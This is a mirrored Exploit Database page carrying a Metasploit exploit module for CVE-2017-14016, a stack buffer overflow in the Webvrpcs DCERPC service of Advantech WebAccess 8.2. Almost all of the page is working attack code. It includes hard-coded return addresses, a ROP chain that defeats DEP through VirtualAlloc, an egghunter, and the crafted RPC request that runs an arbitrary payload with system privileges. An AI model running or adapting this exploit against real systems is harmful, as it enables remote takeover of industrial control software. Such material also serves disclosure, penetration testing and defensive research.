Advantech WebAccess 8.2-2017.03.31 – Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)

• Exploit Database
• 118 阅读

• 作者： Metasploit
  日期： 2017-12-14
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43340/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142

  ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote   Rank = GoodRanking   include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, &apos;Author&apos; => [ &apos;mr_me <mr_me[at]offensive-security[dot]com>&apos; ], &apos;License&apos;=> MSF_LICENSE, &apos;References&apos; => [ [ &apos;ZDI&apos;, &apos;17-938&apos; ], [ &apos;CVE&apos;, &apos;2017-14016&apos; ], [ &apos;URL&apos;, &apos;https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02&apos; ] ], &apos;Privileged&apos; => true, &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;thread&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos;=> 2048, &apos;BadChars&apos; => "\x00", }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31&apos;, { &apos;Ret&apos; => 0x07036cdc,# pop ebx; add esp, 994; retn 0x14 &apos;Slide&apos; => 0x07048f5b,# retn &apos;Jmp&apos; => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], &apos;DisclosureDate&apos; => &apos;Nov 02 2017&apos;, &apos;DefaultTarget&apos;=> 0)) register_options([ Opt::RPORT(4592)]) end   def create_rop_chain()   # this target opts into dep rop_gadgets = [ 0x020214c6,# POP EAX # RETN [BwKrlAPI.dll] 0x0203a134,# ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4,# MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee,# XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646,# POP EBP # RETN [BwKrlAPI.dll] 0x07024822,# & push esp # ret[BwPAlarm.dll] 0x070442dd,# POP EAX # RETN [BwPAlarm.dll] 0xffffffff,# Value to negate, will become 0x00000001 0x070467d2,# NEG EAX # RETN [BwPAlarm.dll] 0x0704de61,# PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack(&apos;V&apos;), rand_text_alpha(4).unpack(&apos;V&apos;), rand_text_alpha(4).unpack(&apos;V&apos;), 0x02030af7,# POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5,# put delta into eax (-> put 0x00001000 into edx) 0x02029003,# ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a,# XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5,# POP EAX # RETN [BwPAlarm.dll] 0xffffffc0,# Value to negate, will become 0x00000040 0x070467d2,# NEG EAX # RETN [BwPAlarm.dll] 0x07011e60,# PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66,# POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack(&apos;V&apos;), rand_text_alpha(4).unpack(&apos;V&apos;), 0x0703d825,# RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65,# POP EAX # RETN [BwKrlAPI.dll] 0x90909090,# nop 0x07048f5a,# PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end   def exploit connect handle = dcerpc_handle(&apos;5d2b62aa-ee0a-4a95-91ae-b064fdb471fc&apos;, &apos;1.0&apos;, &apos;ncacn_ip_tcp&apos;, [datastore[&apos;RPORT&apos;]]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...")   # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack(&apos;V&apos;)) handle = resp.last(4).unpack(&apos;V&apos;).first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)   # apparently this is called a ret chain overflow= [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Jmp&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Ret&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << [target[&apos;Slide&apos;]].pack(&apos;V&apos;) overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length)   # sorry but I dont like msf&apos;s ndr class. sploit= [handle].pack(&apos;V&apos;) sploit << [0x000138bd].pack(&apos;V&apos;)# opcode we are attacking sploit << [0x00001000].pack(&apos;V&apos;)# size to copy sploit << [0x00001000].pack(&apos;V&apos;)# size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end